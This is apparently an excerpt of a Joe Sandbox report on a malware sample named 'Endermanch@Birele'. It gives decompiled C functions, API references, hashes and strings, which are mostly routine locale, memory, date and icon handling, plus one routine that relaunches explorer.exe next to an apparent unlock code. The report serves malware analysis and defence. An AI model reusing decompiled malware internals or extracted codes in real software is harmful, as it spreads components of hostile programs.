                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                                  • Opcode ID: c8cd230da66c324bb7c7ed45a10a2f82c499ce72da6a25a6c281108747935b4f
                                                                                                                                                  • Instruction ID: 2dd30684cf486b67022390aed3356d3c1460ac258ad9161a73c5d8ff110f3458
                                                                                                                                                  • Opcode Fuzzy Hash: c8cd230da66c324bb7c7ed45a10a2f82c499ce72da6a25a6c281108747935b4f
                                                                                                                                                  • Instruction Fuzzy Hash: 8D413170A002589BDB21EB59CC85BDAB7FC9B08304F4441FAE548F7292D7789F848F59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040CA86(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				char _v273;
                                                                                                                                                  				char _v534;
                                                                                                                                                  				char _v790;
                                                                                                                                                  				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                                                                                                  				char _v824;
                                                                                                                                                  				intOrPtr _v828;
                                                                                                                                                  				char _v832;
                                                                                                                                                  				intOrPtr _v836;
                                                                                                                                                  				char _v840;
                                                                                                                                                  				intOrPtr _v844;
                                                                                                                                                  				char _v848;
                                                                                                                                                  				char* _v852;
                                                                                                                                                  				char _v856;
                                                                                                                                                  				char _v860;
                                                                                                                                                  				char _v1116;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				struct HINSTANCE__* _t40;
                                                                                                                                                  				intOrPtr _t51;
                                                                                                                                                  				struct HINSTANCE__* _t53;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                  				intOrPtr _t85;
                                                                                                                                                  				intOrPtr _t89;
                                                                                                                                                  				intOrPtr* _t92;
                                                                                                                                                  				void* _t105;
                                                                                                                                                  
                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                  				_t74 = __edx;
                                                                                                                                                  				_t92 = __eax;
                                                                                                                                                  				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                                                                                                  				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                                                                                                  					_t40 =  *0x419660; // 0x400000
                                                                                                                                                  					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                                                                                                  					_v12 = E0040CA7C(_t74);
                                                                                                                                                  				} else {
                                                                                                                                                  					_v12 = _t74 - _v820.AllocationBase;
                                                                                                                                                  				}
                                                                                                                                                  				E00409EF8( &_v273, 0x104, E0040D908(0x5c) + 1);
                                                                                                                                                  				_t75 = 0x40cc08;
                                                                                                                                                  				_t89 = 0x40cc08;
                                                                                                                                                  				_t85 =  *0x408b44; // 0x408b90
                                                                                                                                                  				if(E00403084(_t92, _t85) != 0) {
                                                                                                                                                  					_t75 = E00403E38( *((intOrPtr*)(_t92 + 4)));
                                                                                                                                                  					_t69 = E00409ED0(_t75, 0x40cc08);
                                                                                                                                                  					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                                                                                                  						_t89 = 0x40cc0c;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t51 =  *0x4186c8; // 0x4088f4
                                                                                                                                                  				_t16 = _t51 + 4; // 0xffe7
                                                                                                                                                  				_t53 =  *0x419660; // 0x400000
                                                                                                                                                  				LoadStringA(E004048BC(_t53),  *_t16,  &_v790, 0x100);
                                                                                                                                                  				E00402E70( *_t92,  &_v1116);
                                                                                                                                                  				_v860 =  &_v1116;
                                                                                                                                                  				_v856 = 4;
                                                                                                                                                  				_v852 =  &_v273;
                                                                                                                                                  				_v848 = 6;
                                                                                                                                                  				_v844 = _v12;
                                                                                                                                                  				_v840 = 5;
                                                                                                                                                  				_v836 = _t75;
                                                                                                                                                  				_v832 = 6;
                                                                                                                                                  				_v828 = _t89;
                                                                                                                                                  				_v824 = 6;
                                                                                                                                                  				E0040A418(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                                                                                                                                  				return E00409ED0(_v8, _t89);
                                                                                                                                                  			}































                                                                                                                                                  0x0040ca94
                                                                                                                                                  0x0040ca97
                                                                                                                                                  0x0040ca99
                                                                                                                                                  0x0040caa5
                                                                                                                                                  0x0040cab4
                                                                                                                                                  0x0040cade
                                                                                                                                                  0x0040cae4
                                                                                                                                                  0x0040caf0
                                                                                                                                                  0x0040caf5
                                                                                                                                                  0x0040cafb
                                                                                                                                                  0x0040cafb
                                                                                                                                                  0x0040cb19
                                                                                                                                                  0x0040cb1e
                                                                                                                                                  0x0040cb23
                                                                                                                                                  0x0040cb2a
                                                                                                                                                  0x0040cb37
                                                                                                                                                  0x0040cb41
                                                                                                                                                  0x0040cb45
                                                                                                                                                  0x0040cb4c
                                                                                                                                                  0x0040cb55
                                                                                                                                                  0x0040cb55
                                                                                                                                                  0x0040cb4c
                                                                                                                                                  0x0040cb66
                                                                                                                                                  0x0040cb6b
                                                                                                                                                  0x0040cb6f
                                                                                                                                                  0x0040cb7a
                                                                                                                                                  0x0040cb87
                                                                                                                                                  0x0040cb92
                                                                                                                                                  0x0040cb98
                                                                                                                                                  0x0040cba5
                                                                                                                                                  0x0040cbab
                                                                                                                                                  0x0040cbb5
                                                                                                                                                  0x0040cbbb
                                                                                                                                                  0x0040cbc2
                                                                                                                                                  0x0040cbc8
                                                                                                                                                  0x0040cbcf
                                                                                                                                                  0x0040cbd5
                                                                                                                                                  0x0040cbf1
                                                                                                                                                  0x0040cc04

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CAA5
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CAC9
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CAE4
                                                                                                                                                  • LoadStringA.USER32(00000000,0000FFE7,?,00000100), ref: 0040CB7A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3990497365-0
                                                                                                                                                  • Opcode ID: ecd71696615d48421c94cf751f245bc04475beec22f887684d54506e64bddcf7
                                                                                                                                                  • Instruction ID: 090159ec49ad22dc376a56598d50e76a4c12ce7ebe7e1118fc34256ebd776d61
                                                                                                                                                  • Opcode Fuzzy Hash: ecd71696615d48421c94cf751f245bc04475beec22f887684d54506e64bddcf7
                                                                                                                                                  • Instruction Fuzzy Hash: F1413070A002589BDB21EB59CC85BDAB7FC9B08304F4441FAA548F7292D7789F849F59
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040DA5C() {
                                                                                                                                                  				char _v152;
                                                                                                                                                  				short _v410;
                                                                                                                                                  				signed short _t14;
                                                                                                                                                  				signed int _t16;
                                                                                                                                                  				int _t18;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				void* _t23;
                                                                                                                                                  				int _t24;
                                                                                                                                                  				int _t26;
                                                                                                                                                  				signed int _t30;
                                                                                                                                                  				signed int _t31;
                                                                                                                                                  				signed int _t32;
                                                                                                                                                  				signed int _t37;
                                                                                                                                                  				int* _t39;
                                                                                                                                                  				short* _t41;
                                                                                                                                                  				void* _t49;
                                                                                                                                                  
                                                                                                                                                  				 *0x4199c8 = 0x409;
                                                                                                                                                  				 *0x4199cc = 9;
                                                                                                                                                  				 *0x4199d0 = 1;
                                                                                                                                                  				_t14 = GetThreadLocale();
                                                                                                                                                  				if(_t14 != 0) {
                                                                                                                                                  					 *0x4199c8 = _t14;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t14 != 0) {
                                                                                                                                                  					 *0x4199cc = _t14 & 0x3ff;
                                                                                                                                                  					 *0x4199d0 = (_t14 & 0x0000ffff) >> 0xa;
                                                                                                                                                  				}
                                                                                                                                                  				memcpy(0x418250, 0x40dbb0, 8 << 2);
                                                                                                                                                  				if( *0x418208 != 2) {
                                                                                                                                                  					_t16 = GetSystemMetrics(0x4a);
                                                                                                                                                  					__eflags = _t16;
                                                                                                                                                  					 *0x4199d5 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                                                                                                                  					_t18 = GetSystemMetrics(0x2a);
                                                                                                                                                  					__eflags = _t18;
                                                                                                                                                  					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                                                                                                                  					 *0x4199d4 = _t31;
                                                                                                                                                  					__eflags = _t31;
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						return E0040D9E4(__eflags, _t49);
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					_t20 = E0040DA44();
                                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                                  						 *0x4199d5 = 0;
                                                                                                                                                  						 *0x4199d4 = 0;
                                                                                                                                                  						return _t20;
                                                                                                                                                  					}
                                                                                                                                                  					E0040D9E4(__eflags, _t49);
                                                                                                                                                  					_t37 = 0x20;
                                                                                                                                                  					_t23 = E00402A00(0x418250, 0x20, 0x40dbb0);
                                                                                                                                                  					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                                                                                                                  					 *0x4199d4 = _t32;
                                                                                                                                                  					__eflags = _t32;
                                                                                                                                                  					if(_t32 != 0) {
                                                                                                                                                  						 *0x4199d5 = 0;
                                                                                                                                                  						return _t23;
                                                                                                                                                  					}
                                                                                                                                                  					_t24 = 0x80;
                                                                                                                                                  					_t39 =  &_v152;
                                                                                                                                                  					do {
                                                                                                                                                  						 *_t39 = _t24;
                                                                                                                                                  						_t24 = _t24 + 1;
                                                                                                                                                  						_t39 =  &(_t39[0]);
                                                                                                                                                  						__eflags = _t24 - 0x100;
                                                                                                                                                  					} while (_t24 != 0x100);
                                                                                                                                                  					_t26 =  *0x4199c8; // 0x409
                                                                                                                                                  					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                                                                                                                  					_t18 = 0x80;
                                                                                                                                                  					_t41 =  &_v410;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						__eflags =  *_t41 - 2;
                                                                                                                                                  						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                                                                                                                  						 *0x4199d5 = _t37;
                                                                                                                                                  						__eflags = _t37;
                                                                                                                                                  						if(_t37 != 0) {
                                                                                                                                                  							goto L17;
                                                                                                                                                  						}
                                                                                                                                                  						_t41 = _t41 + 2;
                                                                                                                                                  						_t18 = _t18 - 1;
                                                                                                                                                  						__eflags = _t18;
                                                                                                                                                  						if(_t18 != 0) {
                                                                                                                                                  							continue;
                                                                                                                                                  						} else {
                                                                                                                                                  							return _t18;
                                                                                                                                                  						}
                                                                                                                                                  						L18:
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L17:
                                                                                                                                                  				return _t18;
                                                                                                                                                  				goto L18;
                                                                                                                                                  			}



















                                                                                                                                                  0x0040da68
                                                                                                                                                  0x0040da72
                                                                                                                                                  0x0040da7c
                                                                                                                                                  0x0040da86
                                                                                                                                                  0x0040da8d
                                                                                                                                                  0x0040da8f
                                                                                                                                                  0x0040da8f
                                                                                                                                                  0x0040da97
                                                                                                                                                  0x0040daa3
                                                                                                                                                  0x0040daaf
                                                                                                                                                  0x0040daaf
                                                                                                                                                  0x0040dac3
                                                                                                                                                  0x0040dacc
                                                                                                                                                  0x0040db7b
                                                                                                                                                  0x0040db80
                                                                                                                                                  0x0040db85
                                                                                                                                                  0x0040db8c
                                                                                                                                                  0x0040db91
                                                                                                                                                  0x0040db93
                                                                                                                                                  0x0040db96
                                                                                                                                                  0x0040db9c
                                                                                                                                                  0x0040db9e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040dba6
                                                                                                                                                  0x0040dad2
                                                                                                                                                  0x0040dad2
                                                                                                                                                  0x0040dad9
                                                                                                                                                  0x0040dadb
                                                                                                                                                  0x0040dae2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040dae2
                                                                                                                                                  0x0040daef
                                                                                                                                                  0x0040daff
                                                                                                                                                  0x0040db01
                                                                                                                                                  0x0040db06
                                                                                                                                                  0x0040db09
                                                                                                                                                  0x0040db0f
                                                                                                                                                  0x0040db11
                                                                                                                                                  0x0040db13
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040db13
                                                                                                                                                  0x0040db1f
                                                                                                                                                  0x0040db24
                                                                                                                                                  0x0040db2a
                                                                                                                                                  0x0040db2a
                                                                                                                                                  0x0040db2c
                                                                                                                                                  0x0040db2d
                                                                                                                                                  0x0040db2e
                                                                                                                                                  0x0040db2e
                                                                                                                                                  0x0040db4a
                                                                                                                                                  0x0040db50
                                                                                                                                                  0x0040db55
                                                                                                                                                  0x0040db5a
                                                                                                                                                  0x0040db60
                                                                                                                                                  0x0040db60
                                                                                                                                                  0x0040db64
                                                                                                                                                  0x0040db67
                                                                                                                                                  0x0040db6d
                                                                                                                                                  0x0040db6f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040db71
                                                                                                                                                  0x0040db74
                                                                                                                                                  0x0040db74
                                                                                                                                                  0x0040db75
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040db75
                                                                                                                                                  0x0040db60
                                                                                                                                                  0x0040dbad
                                                                                                                                                  0x0040dbad
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040DB50
                                                                                                                                                  • GetThreadLocale.KERNEL32 ref: 0040DA86
                                                                                                                                                    • Part of subcall function 0040D9E4: GetCPInfo.KERNEL32(00000000,?), ref: 0040D9FD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocaleStringThreadType
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1505017576-0
                                                                                                                                                  • Opcode ID: b4970e404707356a13d24a7b8a088547f9a129f1164e4a98242b4227c3be5c94
                                                                                                                                                  • Instruction ID: eae8cb680bebf2e8bf797c74bef7fb2c71b8613e6afdde9c561ff51ee23c3617
                                                                                                                                                  • Opcode Fuzzy Hash: b4970e404707356a13d24a7b8a088547f9a129f1164e4a98242b4227c3be5c94
                                                                                                                                                  • Instruction Fuzzy Hash: DD3126B1E552418AD710A7A6AC517E337E4AB41314F0880BFE584AB3D2EA7C4C49C76E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E004012EC() {
                                                                                                                                                  				intOrPtr* _t4;
                                                                                                                                                  				intOrPtr _t6;
                                                                                                                                                  				intOrPtr* _t9;
                                                                                                                                                  				intOrPtr* _t12;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  
                                                                                                                                                  				if( *0x4195e0 != 0) {
                                                                                                                                                  					L5:
                                                                                                                                                  					_t4 =  *0x4195e0;
                                                                                                                                                  					 *0x4195e0 =  *_t4;
                                                                                                                                                  					return _t4;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t12 = LocalAlloc(0, 0x644);
                                                                                                                                                  					if(_t12 != 0) {
                                                                                                                                                  						_t6 =  *0x4195dc; // 0x642848
                                                                                                                                                  						 *_t12 = _t6;
                                                                                                                                                  						 *0x4195dc = _t12;
                                                                                                                                                  						_t14 = 0;
                                                                                                                                                  						do {
                                                                                                                                                  							_t2 = (_t14 + _t14) * 8; // 0x4
                                                                                                                                                  							_t9 = _t12 + _t2 + 4;
                                                                                                                                                  							 *_t9 =  *0x4195e0;
                                                                                                                                                  							 *0x4195e0 = _t9;
                                                                                                                                                  							_t14 = _t14 + 1;
                                                                                                                                                  						} while (_t14 != 0x64);
                                                                                                                                                  						goto L5;
                                                                                                                                                  					} else {
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}








                                                                                                                                                  0x004012f6
                                                                                                                                                  0x00401332
                                                                                                                                                  0x00401332
                                                                                                                                                  0x00401336
                                                                                                                                                  0x0040133a
                                                                                                                                                  0x004012f8
                                                                                                                                                  0x00401304
                                                                                                                                                  0x00401308
                                                                                                                                                  0x0040130f
                                                                                                                                                  0x00401314
                                                                                                                                                  0x00401316
                                                                                                                                                  0x0040131c
                                                                                                                                                  0x0040131e
                                                                                                                                                  0x00401322
                                                                                                                                                  0x00401322
                                                                                                                                                  0x00401328
                                                                                                                                                  0x0040132a
                                                                                                                                                  0x0040132c
                                                                                                                                                  0x0040132d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040130a
                                                                                                                                                  0x0040130e
                                                                                                                                                  0x0040130e
                                                                                                                                                  0x00401308

                                                                                                                                                  APIs
                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000644,?,l.d,0040134F,?,?,004013EE,?,?,?,00000000,00004003,0040192F), ref: 004012FF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                  • String ID: H(d$L.d$l.d
                                                                                                                                                  • API String ID: 3494564517-3671046880
                                                                                                                                                  • Opcode ID: 6d4107bb9de44e2e435fdebb758e93b741ab8b8fcec454dcc6f55fe7b74c7d0d
                                                                                                                                                  • Instruction ID: 803d661eb34c241a9c0abbaa1cb019ef2c2d3bd750285f357371358ae98416de
                                                                                                                                                  • Opcode Fuzzy Hash: 6d4107bb9de44e2e435fdebb758e93b741ab8b8fcec454dcc6f55fe7b74c7d0d
                                                                                                                                                  • Instruction Fuzzy Hash: 22F082767012018FEB25CF69D890696B3E6EB99315F24C07FD584E7760D7368C418B48
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E0040B2EC(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				short _v18;
                                                                                                                                                  				short _v22;
                                                                                                                                                  				struct _SYSTEMTIME _v24;
                                                                                                                                                  				char _v280;
                                                                                                                                                  				char* _t32;
                                                                                                                                                  				intOrPtr* _t49;
                                                                                                                                                  				intOrPtr _t58;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				void* _t67;
                                                                                                                                                  
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t49 = __edx;
                                                                                                                                                  				_t63 = __eax;
                                                                                                                                                  				_push(_t67);
                                                                                                                                                  				_push(0x40b3ca);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t67 + 0xfffffeec;
                                                                                                                                                  				E004039AC(__edx);
                                                                                                                                                  				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                                                                                                                                                  				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                                                                                                                                                  				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                                                                                                                                                  				if(_t63 > 2) {
                                                                                                                                                  					E00403A44( &_v8, 0x40b3ec);
                                                                                                                                                  				} else {
                                                                                                                                                  					E00403A44( &_v8, 0x40b3e0);
                                                                                                                                                  				}
                                                                                                                                                  				_t32 = E00403E38(_v8);
                                                                                                                                                  				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                                                                                                                                  					E00403C1C(_t49, 0x100,  &_v280);
                                                                                                                                                  					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                                                                                                                                  						E00403E98( *_t49, E00403C48( *_t49) - 1, 2, _t49);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t58);
                                                                                                                                                  				 *[fs:eax] = _t58;
                                                                                                                                                  				_push(E0040B3D1);
                                                                                                                                                  				return E004039AC( &_v8);
                                                                                                                                                  			}













                                                                                                                                                  0x0040b2f9
                                                                                                                                                  0x0040b2fc
                                                                                                                                                  0x0040b2fe
                                                                                                                                                  0x0040b302
                                                                                                                                                  0x0040b303
                                                                                                                                                  0x0040b308
                                                                                                                                                  0x0040b30b
                                                                                                                                                  0x0040b310
                                                                                                                                                  0x0040b31c
                                                                                                                                                  0x0040b327
                                                                                                                                                  0x0040b332
                                                                                                                                                  0x0040b339
                                                                                                                                                  0x0040b352
                                                                                                                                                  0x0040b33b
                                                                                                                                                  0x0040b343
                                                                                                                                                  0x0040b343
                                                                                                                                                  0x0040b366
                                                                                                                                                  0x0040b37f
                                                                                                                                                  0x0040b38e
                                                                                                                                                  0x0040b394
                                                                                                                                                  0x0040b3af
                                                                                                                                                  0x0040b3af
                                                                                                                                                  0x0040b394
                                                                                                                                                  0x0040b3b6
                                                                                                                                                  0x0040b3b9
                                                                                                                                                  0x0040b3bc
                                                                                                                                                  0x0040b3c9

                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0040B3CA), ref: 0040B372
                                                                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0040B3CA), ref: 0040B378
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                                                                  • String ID: yyyy
                                                                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                                                                  • Opcode ID: 885e4c27a1216b17a0c31e6b7352c7ee43f58de2aae632ef4a415d169554587d
                                                                                                                                                  • Instruction ID: 73b892271113bbbbdae0ef577cd336b99a0cbc3d07830473da285584bb1de4d6
                                                                                                                                                  • Opcode Fuzzy Hash: 885e4c27a1216b17a0c31e6b7352c7ee43f58de2aae632ef4a415d169554587d
                                                                                                                                                  • Instruction Fuzzy Hash: 7D213175600648ABDB01EF55C842AAE77A8EF48704F60407AFD04F7791D7789E408BAD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040865C: GetWindowTextLengthA.USER32(?), ref: 0040866D
                                                                                                                                                    • Part of subcall function 0040865C: GetWindowTextA.USER32(?,?,00000001), ref: 0040868D
                                                                                                                                                  • WinExec.KERNEL32(explorer.exe,00000001), ref: 00417095
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: TextWindow$ExecLength
                                                                                                                                                  • String ID: 9786775$explorer.exe
                                                                                                                                                  • API String ID: 115403521-1257943924
                                                                                                                                                  • Opcode ID: 15c5f1cb987b3db33f017bf8d90f669295af8f305caff8f5978a728cf0ff2006
                                                                                                                                                  • Instruction ID: 996130340d25c92e2aaf75525aef91bf16520e7e0ea9b7ae20f6f14c8a600e54
                                                                                                                                                  • Opcode Fuzzy Hash: 15c5f1cb987b3db33f017bf8d90f669295af8f305caff8f5978a728cf0ff2006
                                                                                                                                                  • Instruction Fuzzy Hash: 7411CA347043049BD700FF55C882B8DBBB5DF4C704F51846BF8006B382DA79AE44865D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E0040784C(void* __eax) {
                                                                                                                                                  				void* _t8;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				intOrPtr _t13;
                                                                                                                                                  
                                                                                                                                                  				_t12 = __eax;
                                                                                                                                                  				_t8 =  *((intOrPtr*)(__eax + 0xfe)) + 1;
                                                                                                                                                  				if(_t8 != 0) {
                                                                                                                                                  					_t8 = _t8 - 1;
                                                                                                                                                  					if(_t8 == 0) {
                                                                                                                                                  						_t13 =  *0x4198a8; // 0x2170a88
                                                                                                                                                  						asm("jecxz 0x28");
                                                                                                                                                  						if(_t13 == __eax) {
                                                                                                                                                  							_t9 = LoadIconA( *0x419660, "MAINICON");
                                                                                                                                                  							L6:
                                                                                                                                                  							 *(_t12 + 0xfe) = _t9;
                                                                                                                                                  							return _t9;
                                                                                                                                                  						}
                                                                                                                                                  						_t8 = E0040784C(_t13);
                                                                                                                                                  						if(_t8 != 0) {
                                                                                                                                                  							_t9 = CopyImage(_t8, 1, 0, 0, 0);
                                                                                                                                                  							goto L6;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t8;
                                                                                                                                                  			}







                                                                                                                                                  0x0040784d
                                                                                                                                                  0x00407854
                                                                                                                                                  0x00407855
                                                                                                                                                  0x00407857
                                                                                                                                                  0x00407858
                                                                                                                                                  0x0040785a
                                                                                                                                                  0x00407860
                                                                                                                                                  0x00407864
                                                                                                                                                  0x00407893
                                                                                                                                                  0x00407898
                                                                                                                                                  0x00407898
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407898
                                                                                                                                                  0x00407867
                                                                                                                                                  0x0040786e
                                                                                                                                                  0x00407878
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00407878
                                                                                                                                                  0x0040786e
                                                                                                                                                  0x00407858
                                                                                                                                                  0x0040789f

                                                                                                                                                  APIs
                                                                                                                                                  • LoadIconA.USER32(MAINICON), ref: 00407893
                                                                                                                                                    • Part of subcall function 0040784C: CopyImage.USER32(00000000,00000001,00000000,00000000,00000000), ref: 00407878
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CopyIconImageLoad
                                                                                                                                                  • String ID: MAINICON
                                                                                                                                                  • API String ID: 2942751960-2283262055
